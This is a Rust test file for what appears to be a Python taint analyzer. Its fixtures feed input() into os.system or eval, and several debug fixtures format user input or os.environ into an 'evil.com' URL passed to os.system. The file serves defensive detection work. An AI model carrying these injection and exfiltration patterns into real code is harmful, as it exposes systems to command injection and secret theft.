#![cfg(feature = "python")]
use pyrograph::{analyze, parse::parse_python};
/// Parses `source` as the Python file `{name}.py`, analyzes the resulting
/// graph, and asserts that at least one finding is reported.
///
/// # Panics
///
/// Panics if parsing fails, if analysis fails, or if the analysis yields no
/// findings.
fn assert_detects(name: &str, source: &str) {
    let file_name = format!("{name}.py");
    // `expect` names the failing stage so a panic is attributable without
    // having to look up the line number.
    let graph = parse_python(source, &file_name).expect("parse_python failed on the test fixture");
    let findings = analyze(&graph).expect("analyze failed on the parsed test fixture");
    assert!(!findings.is_empty(), "expected finding for {name}: {findings:?}");
}
/// Parses `source` as the Python file `{name}.py`, analyzes the resulting
/// graph, and asserts that no findings are reported.
///
/// # Panics
///
/// Panics if parsing fails, if analysis fails, or if the analysis yields any
/// finding (the findings are included in the panic message).
fn assert_clean(name: &str, source: &str) {
    let file_name = format!("{name}.py");
    // `expect` names the failing stage so a panic is attributable without
    // having to look up the line number.
    let graph = parse_python(source, &file_name).expect("parse_python failed on the test fixture");
    let findings = analyze(&graph).expect("analyze failed on the parsed test fixture");
    assert!(findings.is_empty(), "unexpected finding for {name}: {findings:?}");
}
/// Expects a finding when `input()` reaches `system` called through a module
/// alias (`import os as o`).
#[test]
fn tp_import_alias_system() {
    let fixture = concat!(
        "import os as o\n",
        "cmd = input()\n",
        "o.system(cmd)\n",
    );
    assert_detects("tp_import_alias_system", fixture);
}
/// Expects a finding when `input()` reaches `os.system` imported under a
/// function alias (`from os import system as s`).
#[test]
fn tp_from_import_alias_system() {
    let fixture = concat!(
        "from os import system as s\n",
        "cmd = input()\n",
        "s(cmd)\n",
    );
    assert_detects("tp_from_import_alias_system", fixture);
}
/// Expects a finding when data read from a file inside a `with open(...)`
/// block is interpolated into an f-string that is passed to `os.system`.
#[test]
fn tp_with_open_fstring_system() {
    let fixture = concat!(
        "import os\n",
        "with open('x') as f:\n",
        " data = f.read()\n",
        "cmd = f'echo {data}'\n",
        "os.system(cmd)\n",
    );
    assert_detects("tp_with_open_fstring_system", fixture);
}
/// Expects a finding when `input()` flows through a list comprehension and an
/// element of the resulting list is passed to `os.system`.
#[test]
fn tp_list_comp_system() {
    let fixture = concat!(
        "import os\n",
        "data = input()\n",
        "items = [x for x in data]\n",
        "os.system(items[0])\n",
    );
    assert_detects("tp_list_comp_system", fixture);
}
/// Expects a finding when `input()` is interpolated into an f-string that is
/// passed to `os.system`.
#[test]
fn tp_fstring_system() {
    let fixture = concat!(
        "import os\n",
        "secret = input()\n",
        "cmd = f'echo {secret}'\n",
        "os.system(cmd)\n",
    );
    assert_detects("tp_fstring_system", fixture);
}
/// Expects no findings when the `input()` value is converted with `int()`
/// before being interpolated into the f-string passed to `os.system`.
#[test]
fn fp_fstring_sanitized() {
    let fixture = concat!(
        "import os\n",
        "secret = input()\n",
        "safe = int(secret)\n",
        "cmd = f'echo {safe}'\n",
        "os.system(cmd)\n",
    );
    assert_clean("fp_fstring_sanitized", fixture);
}
/// Expects a finding when `input()` is passed as a keyword-only argument
/// (alongside a `**kwargs` expansion) to a function that forwards it to
/// `os.system`.
#[test]
fn tp_kwargs_interprocedural() {
    let fixture = concat!(
        "import os\n",
        "def run(*, cmd):\n",
        " os.system(cmd)\n",
        "payload = input()\n",
        "kwargs = {'shell': True}\n",
        "run(cmd=payload, **kwargs)\n",
    );
    assert_detects("tp_kwargs_interprocedural", fixture);
}
/// Expects a finding when `eval(request.form['code'])` appears as a decorator
/// expression on a function definition.
#[test]
fn tp_decorator_sink() {
    let fixture = concat!(
        "from flask import request\n",
        "@eval(request.form['code'])\n",
        "def handler(): pass\n",
    );
    assert_detects("tp_decorator_sink", fixture);
}
/// Expects a finding when `eval(request.form['code'])` is the second of two
/// stacked decorators on a function definition.
#[test]
fn tp_nested_decorator_sink() {
    let fixture = concat!(
        "from flask import request\n",
        "@app.route('/')\n",
        "@eval(request.form['code'])\n",
        "def handler(): pass\n",
    );
    assert_detects("tp_nested_decorator_sink", fixture);
}
/// Expects a finding when both the `input()` call and the `os.system` call
/// live inside a bare `except:` handler.
#[test]
fn tp_try_except_input_system() {
    let fixture = concat!(
        "import os\n",
        "try:\n",
        " pass\n",
        "except:\n",
        " cmd = input()\n",
        " os.system(cmd)\n",
    );
    assert_detects("tp_try_except_input_system", fixture);
}
/// Expects a finding when `input()` is raised inside `try` and the bound
/// exception variable is passed to `eval` in the `except` handler.
#[test]
fn tp_try_except_raise_flow() {
    let fixture = concat!(
        "try:\n",
        " raise input()\n",
        "except Exception as e:\n",
        " eval(e)\n",
    );
    assert_detects("tp_try_except_raise_flow", fixture);
}
/// Diagnostic dump for a `str.format(secret)` fixture: prints the finding
/// count, every graph node, and the outgoing edges of node `0` to stderr.
///
/// NOTE(review): this test makes no assertions; it fails only if parsing or
/// analysis panics on `unwrap`.
#[test]
fn debug_format_taint() {
    let py_src = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(secret)
os.system(cmd)
"#;
    let pdg = parse_python(py_src, "test.py").unwrap();
    let reports = analyze(&pdg).unwrap();
    let count = reports.len();
    eprintln!("findings count: {count}");
    for n in pdg.nodes() {
        eprintln!(" {} {:?} {:?} {:?}", n.id, n.kind, n.name, n.label);
    }
    // The first tuple element is printed as the edge's destination.
    for (target, edge_kind) in pdg.edges_from(0) {
        eprintln!(" edge from 0 -> {target} {edge_kind:?}");
    }
}
/// Diagnostic dump for a `str.format(secret)` fixture: prints the finding
/// count, each finding's source/sink/path, and every edge of the graph to
/// stderr.
///
/// NOTE(review): this test makes no assertions; it fails only if parsing or
/// analysis panics on `unwrap`.
#[test]
fn debug_format_taint2() {
    let py_src = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(secret)
os.system(cmd)
"#;
    let pdg = parse_python(py_src, "test.py").unwrap();
    let reports = analyze(&pdg).unwrap();
    let count = reports.len();
    eprintln!("findings count: {count}");
    for finding in &reports {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }
    for n in pdg.nodes() {
        for (target, edge_kind) in pdg.edges_from(n.id) {
            eprintln!("edge: {} -> {} {:?}", n.id, target, edge_kind);
        }
    }
}
/// Diagnostic dump for an f-string fixture whose result is passed to `eval`:
/// prints the finding count, each finding's source/sink/path, and every edge
/// of the graph to stderr.
///
/// NOTE(review): this test makes no assertions; it fails only if parsing or
/// analysis panics on `unwrap`.
#[test]
fn debug_fstring_taint2() {
    let py_src = r#"
secret = input()
cmd = f'https://evil.com/{secret}'
eval(cmd)
"#;
    let pdg = parse_python(py_src, "test.py").unwrap();
    let reports = analyze(&pdg).unwrap();
    let count = reports.len();
    eprintln!("fstring findings count: {count}");
    for finding in &reports {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }
    for n in pdg.nodes() {
        for (target, edge_kind) in pdg.edges_from(n.id) {
            eprintln!("edge: {} -> {} {:?}", n.id, target, edge_kind);
        }
    }
}
/// Diagnostic dump for a `.format(**locals())` fixture: prints the finding
/// count, each finding's source/sink/path, and every node followed by its
/// outgoing edges to stderr.
///
/// NOTE(review): this test makes no assertions; it fails only if parsing or
/// analysis panics on `unwrap`.
/// NOTE(review): in real Python a positional `{}` fed only keyword arguments
/// raises at runtime; presumably irrelevant to the analysis, but confirm the
/// fixture is intentional.
#[test]
fn debug_format_locals() {
    let py_src = r#"
import os
secret = input()
cmd = 'https://evil.com/{}'.format(**locals())
os.system(cmd)
"#;
    let pdg = parse_python(py_src, "test.py").unwrap();
    let reports = analyze(&pdg).unwrap();
    let count = reports.len();
    eprintln!("format(**locals) findings count: {count}");
    for finding in &reports {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }
    for n in pdg.nodes() {
        eprintln!(" {} {:?} {:?}", n.id, n.kind, n.name);
        for (target, edge_kind) in pdg.edges_from(n.id) {
            eprintln!(" edge -> {target} {edge_kind:?}");
        }
    }
}
/// Diagnostic dump for a fixture that stores `input()` on an object attribute
/// and interpolates that attribute into an f-string passed to `os.system`:
/// prints the finding count and each finding's source/sink/path to stderr.
///
/// NOTE(review): this test makes no assertions; it fails only if parsing or
/// analysis panics on `unwrap`.
#[test]
fn debug_fstring_complex() {
    let py_src = r#"
import os
obj = type('X', (), {})()
obj.secret = input()
cmd = f'https://evil.com/{obj.secret}'
os.system(cmd)
"#;
    let pdg = parse_python(py_src, "test.py").unwrap();
    let reports = analyze(&pdg).unwrap();
    let count = reports.len();
    eprintln!("fstring complex findings count: {count}");
    for finding in &reports {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }
}
/// Diagnostic dump for a `.format(**os.environ)` fixture: prints the finding
/// count, each finding's source/sink/path, and every node followed by its
/// outgoing edges to stderr.
///
/// NOTE(review): this test makes no assertions; it fails only if parsing or
/// analysis panics on `unwrap`.
/// NOTE(review): in real Python a positional `{}` fed only keyword arguments
/// raises at runtime; presumably irrelevant to the analysis, but confirm the
/// fixture is intentional.
#[test]
fn debug_format_os_environ() {
    let py_src = r#"
import os
cmd = 'https://evil.com/{}'.format(**os.environ)
os.system(cmd)
"#;
    let pdg = parse_python(py_src, "test.py").unwrap();
    let reports = analyze(&pdg).unwrap();
    let count = reports.len();
    eprintln!("format(**os.environ) findings count: {count}");
    for finding in &reports {
        eprintln!(
            "finding: source={} sink={} path={:?}",
            finding.source, finding.sink, finding.path
        );
    }
    for n in pdg.nodes() {
        eprintln!(" {} {:?} {:?}", n.id, n.kind, n.name);
        for (target, edge_kind) in pdg.edges_from(n.id) {
            eprintln!(" edge -> {target} {edge_kind:?}");
        }
    }
}